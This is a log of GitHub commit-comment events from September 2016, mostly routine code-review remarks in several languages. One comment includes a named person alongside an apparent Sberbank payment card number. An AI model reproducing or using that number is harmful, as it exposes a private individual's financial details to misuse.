{"id":"4507242631","type":"CommitCommentEvent","actor":{"login":"MrZaYaC"},"repo":{"name":"nikiforovserge/Hillel-FE-Basic"},"payload":{"comment":{"id":18876838,"position":36,"line":36,"path":"style.css","commit_id":"010b9542008998520642fa2532b059ea02efd99f","created_at":"2016-09-02T08:28:49Z","updated_at":"2016-09-02T08:28:49Z","body":"лишняя пустая строка, и нижу по коду тоже есть в паре мест"}},"created_at":"2016-09-02T08:28:49Z"}
{"id":"4507244023","type":"CommitCommentEvent","actor":{"login":"vigiljose"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18876841,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-02T08:29:10Z","updated_at":"2016-09-02T08:29:10Z","body":"Thank you CvH,\n\nYes, I used the ffmpeg 3.1.3 version, and the latest version the the codecs branch.\n\nSo, for example in your deployment, if you get CPU at 50 % usage of your total CPU (400% for an i7 processor) don’t you see pixelling? blank screens that recover soon, etc?\n\nThat happen in my case using hardware or software transcoding. In order to avoid them, tvheadend should consume less than 10% of total i7 CPU.\n\nAny other idea/suggestion will be more than welcome!\n\nThank you\nJose\n\n\n> On 02 Sep 2016, at 10:12, CvH <notifications@github.com> wrote:\n> \n> @vigiljose <https://github.com/vigiljose> you tested it with the lastest version here (ffmpegt 3.1.3)? Because ffmpeg had in 3.1.2 iirc some transcoding/colour issues - never saw this.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/lekma/tvheadend/commit/06207f2eb2d175d17f8949888654b388002b02f3#commitcomment-18876696>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AUYdw9qVyyKmpAJfeWzwnNLhpC1z9oRZks5ql9pigaJpZM4Jr51R>.\n> \n\n"}},"created_at":"2016-09-02T08:29:10Z"}
{"id":"4507247620","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18876854,"position":null,"line":null,"path":null,"commit_id":"0bedc14c124ef20a1d11b4c5c5fdc746bad02f14","created_at":"2016-09-02T08:29:59Z","updated_at":"2016-09-02T08:29:59Z","body":":postal_horn: "}},"created_at":"2016-09-02T08:29:59Z"}
{"id":"4507249678","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18876858,"position":7,"line":7,"path":"issue11/regist.php","commit_id":"ba80619dcf97541977b73c1d09c1b37c7b69e642","created_at":"2016-09-02T08:30:29Z","updated_at":"2016-09-02T08:30:29Z","body":"インデント調整しましょうか！"}},"created_at":"2016-09-02T08:30:29Z"}
{"id":"4507250930","type":"CommitCommentEvent","actor":{"login":"paplorinc"},"repo":{"name":"javaslang/javaslang"},"payload":{"comment":{"id":18876859,"position":7,"line":184,"path":"javaslang/src/main/java/javaslang/collection/Collections.java","commit_id":"d805e420f97a6255457f1d483fd9af66dfacbac7","created_at":"2016-09-02T08:30:45Z","updated_at":"2016-09-02T08:30:45Z","body":":+1: "}},"created_at":"2016-09-02T08:30:45Z"}
{"id":"4507251638","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18876860,"position":7,"line":7,"path":"issue11/result.php","commit_id":"ba80619dcf97541977b73c1d09c1b37c7b69e642","created_at":"2016-09-02T08:30:55Z","updated_at":"2016-09-02T08:30:55Z","body":"こちらもインデントとPHPの処理コードの位置ですね。"}},"created_at":"2016-09-02T08:30:55Z"}
{"id":"4507254497","type":"CommitCommentEvent","actor":{"login":"nim-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18876868,"position":null,"line":null,"path":null,"commit_id":"c2fe9fe0e6b7e8d84eabfbdd6f6b69ecd14c4a79","created_at":"2016-09-02T08:31:34Z","updated_at":"2016-09-02T08:31:34Z","body":"@danimaribeiro : that is weird, some status bars are broken, others aren't. This should solve it anyway: https://github.com/odoo/odoo/pull/13373"}},"created_at":"2016-09-02T08:31:34Z"}
{"id":"4507255234","type":"CommitCommentEvent","actor":{"login":"paplorinc"},"repo":{"name":"javaslang/javaslang"},"payload":{"comment":{"id":18876870,"position":138,"line":224,"path":"javaslang/src/main/java/javaslang/collection/Map.java","commit_id":"d805e420f97a6255457f1d483fd9af66dfacbac7","created_at":"2016-09-02T08:31:46Z","updated_at":"2016-09-02T08:31:46Z","body":"is this still a thing? I thought we agreed that we only care about Idea :/"}},"created_at":"2016-09-02T08:31:46Z"}
{"id":"4507256326","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18876873,"position":16,"line":16,"path":"issue11/result.php","commit_id":"ba80619dcf97541977b73c1d09c1b37c7b69e642","created_at":"2016-09-02T08:32:03Z","updated_at":"2016-09-02T08:32:03Z","body":"var_dumpでどこまで正常にデータが取れているのか確かめてみましょう。\r\n\r\nどこまでかわかるとそれより前の処理がどこか間違えていることがわかるはずです。"}},"created_at":"2016-09-02T08:32:03Z"}
{"id":"4507257905","type":"CommitCommentEvent","actor":{"login":"shkm"},"repo":{"name":"DavyCardinaal/dotfiles"},"payload":{"comment":{"id":18876875,"position":4,"line":20,"path":"vimrc","commit_id":"7a037c73d28c0ca9f6e87222eb0a069365aec4e2","created_at":"2016-09-02T08:32:26Z","updated_at":"2016-09-02T08:32:26Z","body":"You can also do this with a really simple command, if you ever do need it.\r\n\r\n`command! PrettyJson :%!python -m json.tool`"}},"created_at":"2016-09-02T08:32:26Z"}
{"id":"4507260964","type":"CommitCommentEvent","actor":{"login":"asoldano"},"repo":{"name":"gaol/wildfly"},"payload":{"comment":{"id":18876882,"position":82,"line":82,"path":"testsuite/integration/basic/src/test/java/org/jboss/as/test/integration/jaxrs/packaging/war/JaxrsDeploymentTestCase.java","commit_id":"34afc2d295fbe0bfe49eade195e6754837fd7364","created_at":"2016-09-02T08:33:10Z","updated_at":"2016-09-02T08:33:10Z","body":"Minor note: do we really want to display:\r\n\r\norg.jboss.as.test.integration.jaxrs.packaging.war.HelloWorldResource.sayHello(arg0 : java.lang.String) : java.lang.String\r\n\r\ninstead of -say- : \r\n\r\njava.lang.String org.jboss.as.test.integration.jaxrs.packaging.war.HelloWorldResource.sayHello(java.lang.String arg0)\r\n\r\n?\r\n"}},"created_at":"2016-09-02T08:33:10Z"}
{"id":"4507264502","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18876888,"position":null,"line":null,"path":null,"commit_id":"3cd32994be413ea542878f9c40a1ba5bba39032c","created_at":"2016-09-02T08:33:58Z","updated_at":"2016-09-02T08:33:58Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BHOQASGf&#x2F;1965-bug-996978-rgw-region-root-pool-configuration-option-is-deprecated-in-ses3\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 996978 - rgw_region_root_pool configuration option is deprecated in SES3</a>"}},"created_at":"2016-09-02T08:33:58Z"}
{"id":"4507268751","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18876899,"position":9,"line":21,"path":"R/cut.integer.R","commit_id":"4620a7ec43c9844753d92a34e7f9c5cda560ec5f","created_at":"2016-09-02T08:34:58Z","updated_at":"2016-09-02T08:34:58Z","body":"True - it's not needed in this context, and in any case like you say it doesn't seem to behave consistently in the (default) case anyway."}},"created_at":"2016-09-02T08:34:58Z"}
{"id":"4507270408","type":"CommitCommentEvent","actor":{"login":"NormalityBytes"},"repo":{"name":"NormalityBytes/strandkorb"},"payload":{"comment":{"id":18876904,"position":null,"line":null,"path":null,"commit_id":"cbdc577ac733512d6fbb439faa3c7de53fec31fb","created_at":"2016-09-02T08:35:21Z","updated_at":"2016-09-02T08:35:21Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;E1Z3aPTz&#x2F;14-tech-page-lookup-reparieren\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [TECH] Page lookup reparieren.</a>"}},"created_at":"2016-09-02T08:35:21Z"}
{"id":"4507273371","type":"CommitCommentEvent","actor":{"login":"pdp7"},"repo":{"name":"MatthewWest/adafruit-beaglebone-io-python"},"payload":{"comment":{"id":18876907,"position":null,"line":null,"path":null,"commit_id":"f48e60d501e3a7ae4196f19271b83d51cef4ec4c","created_at":"2016-09-02T08:36:05Z","updated_at":"2016-09-02T08:36:05Z","body":"@MatthewWest All tests I've run are OK for your `develop` branch:\r\n\r\n* [x] Debian 8.5 (2016-08-14):\r\n  * [x] Linux beaglebone 4.1.15-bone18 \r\n  * [x] Linux beaglebone 4.1.14-bone17 \r\n  * [x] Linux beaglebone 4.1.6-bone15\r\n* [x] Debian 8.5 (2016-06-05):\r\n  * [x] Linux beaglebone 4.4.11-ti-r29 \r\n* [x] Debian 8.2 (2015-12-07):\r\n  * [x] Linux beaglebone 4.1.13-ti-r35 GNU/Linux\r\n  * [x] Linux beaglebone 4.4.19-bone13\r\n* [x] Debian 7.5 (2014-05-14):\r\n  * [x] Linux beaglebone 3.8.13-bone50 \r\n\r\nIf you can create a pull request with the fix from your develop branch, then I will test again and merge if no issues."}},"created_at":"2016-09-02T08:36:05Z"}
{"id":"4507274651","type":"CommitCommentEvent","actor":{"login":"ponceta"},"repo":{"name":"camptocamp/c2cgeoportal"},"payload":{"comment":{"id":18876909,"position":null,"line":null,"path":null,"commit_id":"d304a9e5567f6b9c5bb07d3a0ca51602e595f3a6","created_at":"2016-09-02T08:36:23Z","updated_at":"2016-09-02T08:36:23Z","body":"Nice!"}},"created_at":"2016-09-02T08:36:23Z"}
{"id":"4507276812","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"mapserver/mapserver"},"payload":{"comment":{"id":18876914,"position":null,"line":null,"path":null,"commit_id":"b007fdb06871dc95e5b2577c0bd83d16b31459bd","created_at":"2016-09-02T08:36:53Z","updated_at":"2016-09-02T08:36:53Z","body":"Actually correcting myself. There was indeed a similar GDAL issue, but this is not what is triggered here. I'm filing myself the ticket as I've the fix ready"}},"created_at":"2016-09-02T08:36:53Z"}
{"id":"4507287165","type":"CommitCommentEvent","actor":{"login":"wangshuai321"},"repo":{"name":"wangshuai321/learngit3"},"payload":{"comment":{"id":18876945,"position":2,"line":2,"path":"test.txt","commit_id":"a491d131803ee484fac753dcce353ce42369fc6f","created_at":"2016-09-02T08:39:19Z","updated_at":"2016-09-02T08:39:19Z","body":"what's this"}},"created_at":"2016-09-02T08:39:19Z"}
{"id":"4507289023","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":18876948,"position":null,"line":null,"path":null,"commit_id":"2a8e59859248b49eea78abb5a21cca393e12ab94","created_at":"2016-09-02T08:39:47Z","updated_at":"2016-09-02T08:39:47Z","body":"In this case we should ask why the abstract installer class provides the `addFlash` method at all?"}},"created_at":"2016-09-02T08:39:47Z"}
{"id":"4507291352","type":"CommitCommentEvent","actor":{"login":"svk31"},"repo":{"name":"bitshares/bitshares-2"},"payload":{"comment":{"id":18876954,"position":null,"line":null,"path":null,"commit_id":"dfb9043df54a9f51983ed04014cd9ddc2a216323","created_at":"2016-09-02T08:40:21Z","updated_at":"2016-09-02T08:40:21Z","body":"Because the Openledger dev team has started making custom modifications to their fork of the wallet.  I could add this look as an option but I personally prefer having the candles."}},"created_at":"2016-09-02T08:40:21Z"}
{"id":"4507294442","type":"CommitCommentEvent","actor":{"login":"cmfcmf"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":18876960,"position":null,"line":null,"path":null,"commit_id":"2a8e59859248b49eea78abb5a21cca393e12ab94","created_at":"2016-09-02T08:41:02Z","updated_at":"2016-09-02T08:41:02Z","body":"It makes sense for normal modules which are always installed from the web."}},"created_at":"2016-09-02T08:41:02Z"}
{"id":"4507294795","type":"CommitCommentEvent","actor":{"login":"johanbrook"},"repo":{"name":"johanbrook/johanbrook.com"},"payload":{"comment":{"id":18876961,"position":null,"line":null,"path":null,"commit_id":"2822b524a9e9db17d4261f54223bc2e9e115aff3","created_at":"2016-09-02T08:41:08Z","updated_at":"2016-09-02T08:41:08Z","body":"ehehheh"}},"created_at":"2016-09-02T08:41:08Z"}
{"id":"4507298697","type":"CommitCommentEvent","actor":{"login":"FOa1d1"},"repo":{"name":"FOa1d1/Cpp11"},"payload":{"comment":{"id":18876971,"position":null,"line":null,"path":null,"commit_id":"d5b4caa0b028dd8e628b04911bece962ca04353a","created_at":"2016-09-02T08:42:00Z","updated_at":"2016-09-02T08:42:00Z","body":"by me. Correct"}},"created_at":"2016-09-02T08:42:00Z"}
{"id":"4507299466","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"mapserver/mapserver"},"payload":{"comment":{"id":18876973,"position":null,"line":null,"path":null,"commit_id":"b007fdb06871dc95e5b2577c0bd83d16b31459bd","created_at":"2016-09-02T08:42:12Z","updated_at":"2016-09-02T08:42:12Z","body":"See https://github.com/mapserver/mapserver/issues/5317"}},"created_at":"2016-09-02T08:42:12Z"}
{"id":"4507303315","type":"CommitCommentEvent","actor":{"login":"ArkSlane"},"repo":{"name":"tournament-draft/Single-Elimination-"},"payload":{"comment":{"id":18876985,"position":14,"line":43,"path":"app/app.module.ts","commit_id":"b80da317881f33ef9053b9948cfe22e182da1926","created_at":"2016-09-02T08:43:06Z","updated_at":"2016-09-02T08:43:06Z","body":"Added AboutSite and MatchComponent"}},"created_at":"2016-09-02T08:43:06Z"}
{"id":"4507306066","type":"CommitCommentEvent","actor":{"login":"ArkSlane"},"repo":{"name":"tournament-draft/Single-Elimination-"},"payload":{"comment":{"id":18876990,"position":5,"line":12,"path":"app/app.routing.ts","commit_id":"b80da317881f33ef9053b9948cfe22e182da1926","created_at":"2016-09-02T08:43:45Z","updated_at":"2016-09-02T08:43:45Z","body":"fixed HomeSite Link Error"}},"created_at":"2016-09-02T08:43:45Z"}
{"id":"4507307462","type":"CommitCommentEvent","actor":{"login":"ArkSlane"},"repo":{"name":"tournament-draft/Single-Elimination-"},"payload":{"comment":{"id":18876993,"position":4,"line":3,"path":"app/shared/sites/home.site.ts","commit_id":"b80da317881f33ef9053b9948cfe22e182da1926","created_at":"2016-09-02T08:44:05Z","updated_at":"2016-09-02T08:44:05Z","body":"fixed HomeSite Link Error"}},"created_at":"2016-09-02T08:44:05Z"}
{"id":"4507309312","type":"CommitCommentEvent","actor":{"login":"mindisx"},"repo":{"name":"sestoft/C5"},"payload":{"comment":{"id":18876996,"position":90,"line":109,"path":"C5.Tests/concurrent/heaps/ConcurrentHeapTests.cs","commit_id":"1976c811c04f73d110b7419878407130df21ac25","created_at":"2016-09-02T08:44:31Z","updated_at":"2016-09-02T08:44:31Z","body":"Do if"}},"created_at":"2016-09-02T08:44:31Z"}
{"id":"4507317093","type":"CommitCommentEvent","actor":{"login":"guyca"},"repo":{"name":"guyca/react-native"},"payload":{"comment":{"id":18877016,"position":null,"line":null,"path":null,"commit_id":"3ef51a1f17077209f57b36928cc302bca2d1a072","created_at":"2016-09-02T08:46:15Z","updated_at":"2016-09-02T08:46:15Z","body":"No. But I ended up creating my own ReactActivity. You can take a loot at [react-native-navigation](https://github.com/wix/react-native-navigation)\r\n\r\n"}},"created_at":"2016-09-02T08:46:15Z"}
{"id":"4507319603","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/activityinfo"},"payload":{"comment":{"id":18877024,"position":null,"line":null,"path":null,"commit_id":"2e5418bf4c2aab7e2df18cdfebef5860b97f9ecf","created_at":"2016-09-02T08:46:47Z","updated_at":"2016-09-02T08:46:47Z","body":":+1: "}},"created_at":"2016-09-02T08:46:47Z"}
{"id":"4507320139","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":18877027,"position":null,"line":null,"path":null,"commit_id":"2a8e59859248b49eea78abb5a21cca393e12ab94","created_at":"2016-09-02T08:46:55Z","updated_at":"2016-09-02T08:46:55Z","body":"Changed in d0e069730ca49ede52656043934011b11c523c7a"}},"created_at":"2016-09-02T08:46:55Z"}
{"id":"4507321785","type":"CommitCommentEvent","actor":{"login":"machacekondra"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18877032,"position":154,"line":154,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T08:47:18Z","updated_at":"2016-09-02T08:47:18Z","body":"Thanks for noticing. I will add at least this search pattern: 'disk_type= lun'."}},"created_at":"2016-09-02T08:47:18Z"}
{"id":"4507323526","type":"CommitCommentEvent","actor":{"login":"agirorn"},"repo":{"name":"agirorn/jasmine-node-promise-matchers"},"payload":{"comment":{"id":18877036,"position":null,"line":null,"path":null,"commit_id":"aad773ad94579cd3c36a1e392c0d559fb41b07b1","created_at":"2016-09-02T08:47:41Z","updated_at":"2016-09-02T08:47:41Z","body":"You can read more on the issue her jasmine/jasmine-npm#88."}},"created_at":"2016-09-02T08:47:41Z"}
{"id":"4507329915","type":"CommitCommentEvent","actor":{"login":"HopeBetrayer"},"repo":{"name":"flaper/api"},"payload":{"comment":{"id":18877048,"position":null,"line":null,"path":null,"commit_id":"a74cce3ee1330192cb8d3f750751258d2f36e7cd","created_at":"2016-09-02T08:49:09Z","updated_at":"2016-09-02T08:49:09Z","body":"Андрей Кондауров\nСбербанк : 4276 0500 1150 9332\n\n2016-08-31 20:54 GMT+03:00 Stanislav <notifications@github.com>:\n\n> fix comments for images @HopeBetrayer\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/flaper/api/commit/a74cce3ee1330192cb8d3f75075125\n> 8d2f36e7cd\n>\n"}},"created_at":"2016-09-02T08:49:09Z"}
{"id":"4507331258","type":"CommitCommentEvent","actor":{"login":"vbmithr"},"repo":{"name":"janestreet/js-build-tools"},"payload":{"comment":{"id":18877052,"position":10,"line":19,"path":"opam","commit_id":"28af35152166e5611daad548bd6793d6c32e2e47","created_at":"2016-09-02T08:49:26Z","updated_at":"2016-09-02T08:49:26Z","body":"conflicts, not conclicts"}},"created_at":"2016-09-02T08:49:26Z"}
{"id":"4507334363","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18877061,"position":35,"line":35,"path":"src/Controller.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T08:50:10Z","updated_at":"2016-09-02T08:50:10Z","body":"try to set meaningful names. e.g. urishUser -> signedInUser"}},"created_at":"2016-09-02T08:50:10Z"}
{"id":"4507335515","type":"CommitCommentEvent","actor":{"login":"adbl"},"repo":{"name":"wkh237/react-native-fetch-blob"},"payload":{"comment":{"id":18877064,"position":13,"line":115,"path":"src/ios/RNFetchBlobReqBuilder.m","commit_id":"467788b8c47277b3e378a2c077c7404e2a1a8dc9","created_at":"2016-09-02T08:50:23Z","updated_at":"2016-09-02T08:50:23Z","body":"Ok, I had the impression it defaulted to stream based on the wiki. I have no opinion on what's best."}},"created_at":"2016-09-02T08:50:23Z"}
{"id":"4507339137","type":"CommitCommentEvent","actor":{"login":"aluaa"},"repo":{"name":"ylankgz/InvoiceApp"},"payload":{"comment":{"id":18877074,"position":13,"line":13,"path":"config/schedule.rb","commit_id":"42ab443bad8aca84c76b3cc14b75888a06b4b2df","created_at":"2016-09-02T08:51:14Z","updated_at":"2016-09-02T08:51:14Z","body":"http://a0090347.xsph.ru/value.php"}},"created_at":"2016-09-02T08:51:14Z"}
{"id":"4507342158","type":"CommitCommentEvent","actor":{"login":"insidexino"},"repo":{"name":"symless/synergy"},"payload":{"comment":{"id":18877080,"position":13,"line":122,"path":"src/setup/win32/Product.wxs","commit_id":"454bf4dc5f91bb23519b17732829df840e0c6da6","created_at":"2016-09-02T08:51:56Z","updated_at":"2016-09-02T08:51:56Z","body":"Removing this line causes missing dll error"}},"created_at":"2016-09-02T08:51:56Z"}
{"id":"4507343021","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18877082,"position":33,"line":33,"path":"src/Controller.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T08:52:09Z","updated_at":"2016-09-02T08:52:09Z","body":"if you are using generics you don't have to set generic type on right side\r\ne.g. instead of \r\n```\r\nList<User> userList = new ArrayList<User>();\r\nyou can write \r\nstatic   List<User> userList = new ArrayList<>();\r\n```\r\n"}},"created_at":"2016-09-02T08:52:09Z"}
{"id":"4507348434","type":"CommitCommentEvent","actor":{"login":"daN4cat"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":18877094,"position":6,"line":6,"path":"application/hooks/load_stats.php","commit_id":"c88de60a9f6c805332cf54fdc75177fb12908e9f","created_at":"2016-09-02T08:53:22Z","updated_at":"2016-09-02T08:53:22Z","body":"If somebody changes the translation of this with their name we will not know.\r\n\r\nMaybe it's better to change this leaving the \"Open Source Point Of Sale\" hardcoded and in English as a trademark."}},"created_at":"2016-09-02T08:53:22Z"}
{"id":"4507349232","type":"CommitCommentEvent","actor":{"login":"insidexino"},"repo":{"name":"symless/synergy"},"payload":{"comment":{"id":18877099,"position":13,"line":122,"path":"src/setup/win32/Product.wxs","commit_id":"454bf4dc5f91bb23519b17732829df840e0c6da6","created_at":"2016-09-02T08:53:32Z","updated_at":"2016-09-02T08:53:32Z","body":"I'm new to github. What am I supposed to do?"}},"created_at":"2016-09-02T08:53:32Z"}
{"id":"4507349337","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18877100,"position":32,"line":32,"path":"src/Controller.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T08:53:34Z","updated_at":"2016-09-02T08:53:34Z","body":"You shouldn't keep all your user in application memory. You should each time read from database(csv file).\r\nYou should only keep logged in users in memory. "}},"created_at":"2016-09-02T08:53:34Z"}
{"id":"4507349529","type":"CommitCommentEvent","actor":{"login":"cblp"},"repo":{"name":"chrisdone/hindent"},"payload":{"comment":{"id":18877101,"position":9,"line":174,"path":"TESTS.md","commit_id":"d277fa77e675f77e98c590b4d7bd67abe860f12e","created_at":"2016-09-02T08:53:36Z","updated_at":"2016-09-02T08:53:36Z","body":"1. Non-monotonic indentation looks strange.\r\n2. Non-multiple of base indentation looks strange."}},"created_at":"2016-09-02T08:53:36Z"}
{"id":"4507349761","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"jcadduono/idleKernel-note3"},"payload":{"comment":{"id":18877102,"position":null,"line":null,"path":null,"commit_id":"376481267592ae9668f4402c75a729fc5503c09f","created_at":"2016-09-02T08:53:40Z","updated_at":"2016-09-02T08:53:40Z","body":"Ah thanks man! It's neat how the device itself can serve as a chroot for certain operations once in a while ; ) I can't stress how much I appreciate your help : )"}},"created_at":"2016-09-02T08:53:40Z"}
{"id":"4507350346","type":"CommitCommentEvent","actor":{"login":"JimBobSquarePants"},"repo":{"name":"JimBobSquarePants/ImageProcessor"},"payload":{"comment":{"id":18877104,"position":13,"line":19,"path":"src/ImageProcessorCore/Image/ImageBase.cs","commit_id":"9d5d3ae4df90d8cd7d589fe02aa08c9d2e3f34e2","created_at":"2016-09-02T08:53:47Z","updated_at":"2016-09-02T08:53:47Z","body":"We don't it's a hangover from an experiment I was doing earlier. Will fix now."}},"created_at":"2016-09-02T08:53:47Z"}
{"id":"4507353098","type":"CommitCommentEvent","actor":{"login":"cblp"},"repo":{"name":"chrisdone/hindent"},"payload":{"comment":{"id":18877113,"position":9,"line":174,"path":"TESTS.md","commit_id":"d277fa77e675f77e98c590b4d7bd67abe860f12e","created_at":"2016-09-02T08:54:21Z","updated_at":"2016-09-02T08:54:21Z","body":"But I can't invent a better solution."}},"created_at":"2016-09-02T08:54:21Z"}
{"id":"4507365178","type":"CommitCommentEvent","actor":{"login":"johnhaddon"},"repo":{"name":"ImageEngine/gaffer"},"payload":{"comment":{"id":18877145,"position":1,"line":1,"path":"src/GafferAppleseed/AppleseedRender.cpp","commit_id":"0bbba1e94715865c8f862c1d412df273a3c3217a","created_at":"2016-09-02T08:56:59Z","updated_at":"2016-09-02T08:56:59Z","body":"I expect Est is following my lead there Lucien. I developed the Arnold backend in the same style, and we do the same elsewhere in Gaffer wherever many internal private classes are used to compose a single public entity. It does result in fairly big source files, but since the code is all pretty tightly coupled and focussed on a single purpose, I judged that it was more readable to have it in one place than to spread it out.\r\n"}},"created_at":"2016-09-02T08:56:59Z"}
{"id":"4507372953","type":"CommitCommentEvent","actor":{"login":"NAVEENGANDHI"},"repo":{"name":"NAVEENGANDHI/hello-world"},"payload":{"comment":{"id":18877163,"position":null,"line":null,"path":null,"commit_id":"0b43d70017e9dcaf039d45a5fa274e45e7d3472e","created_at":"2016-09-02T08:58:39Z","updated_at":"2016-09-02T08:58:39Z","body":"I am Naveen Gandhi and I am developing my own website."}},"created_at":"2016-09-02T08:58:39Z"}
{"id":"4507378291","type":"CommitCommentEvent","actor":{"login":"mattlewis92"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18877178,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T08:59:48Z","updated_at":"2016-09-02T08:59:48Z","body":"@mlynch I don't think this will ever work, see: http://codepen.io/anon/pen/QKWOPK?editors=1011"}},"created_at":"2016-09-02T08:59:48Z"}
{"id":"4507379438","type":"CommitCommentEvent","actor":{"login":"gaol"},"repo":{"name":"gaol/wildfly"},"payload":{"comment":{"id":18877180,"position":82,"line":82,"path":"testsuite/integration/basic/src/test/java/org/jboss/as/test/integration/jaxrs/packaging/war/JaxrsDeploymentTestCase.java","commit_id":"34afc2d295fbe0bfe49eade195e6754837fd7364","created_at":"2016-09-02T09:00:05Z","updated_at":"2016-09-02T09:00:05Z","body":"Either is fine with me, I choose this format following the way that the UML class diagrams usually do. But your format is more intuitive. :-) "}},"created_at":"2016-09-02T09:00:05Z"}
{"id":"4507382035","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877185,"position":11,"line":69,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:00:35Z","updated_at":"2016-09-02T09:00:35Z","body":"Зачем тебе хеш с ключем \"name\", это же не аргумент метода, а символ name? А вот строкой ниже - уже аргумент. Тебе тут нужен просто пустой хеш ({}), а дальше уже в него добавлять значения, только учесть,  что в хеше еще нет ничего и он \"не знает\", что там должны быть массивы."}},"created_at":"2016-09-02T09:00:35Z"}
{"id":"4507387801","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877198,"position":28,"line":75,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:01:45Z","updated_at":"2016-09-02T09:01:45Z","body":"Это инстанс-метод, а переменная @validate_rules - это переменная уровня класса. На уровне класса и на уровне инстанса будут 2 разные переменные @validate_rules, т.е. этот метод у тебя вернет nil.  Его нужно перенести на уровень ClassMethods, и проще объявить через attr_reader"}},"created_at":"2016-09-02T09:01:45Z"}
{"id":"4507389754","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877206,"position":37,"line":82,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:02:13Z","updated_at":"2016-09-02T09:02:13Z","body":"А чего вдруг true/false начал возвращать? Надо же исключения выбрасывать."}},"created_at":"2016-09-02T09:02:13Z"}
{"id":"4507390627","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877210,"position":34,"line":79,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:02:24Z","updated_at":"2016-09-02T09:02:24Z","body":"Эти методы надо сделать приватными"}},"created_at":"2016-09-02T09:02:24Z"}
{"id":"4507390989","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":18877212,"position":null,"line":null,"path":null,"commit_id":"8a2439555fef77b968c898b125f0a3e9afdeb60e","created_at":"2016-09-02T09:02:29Z","updated_at":"2016-09-02T09:02:29Z","body":"Ah, no, it was fixing ceylon/ceylon-ide-intellij#440"}},"created_at":"2016-09-02T09:02:29Z"}
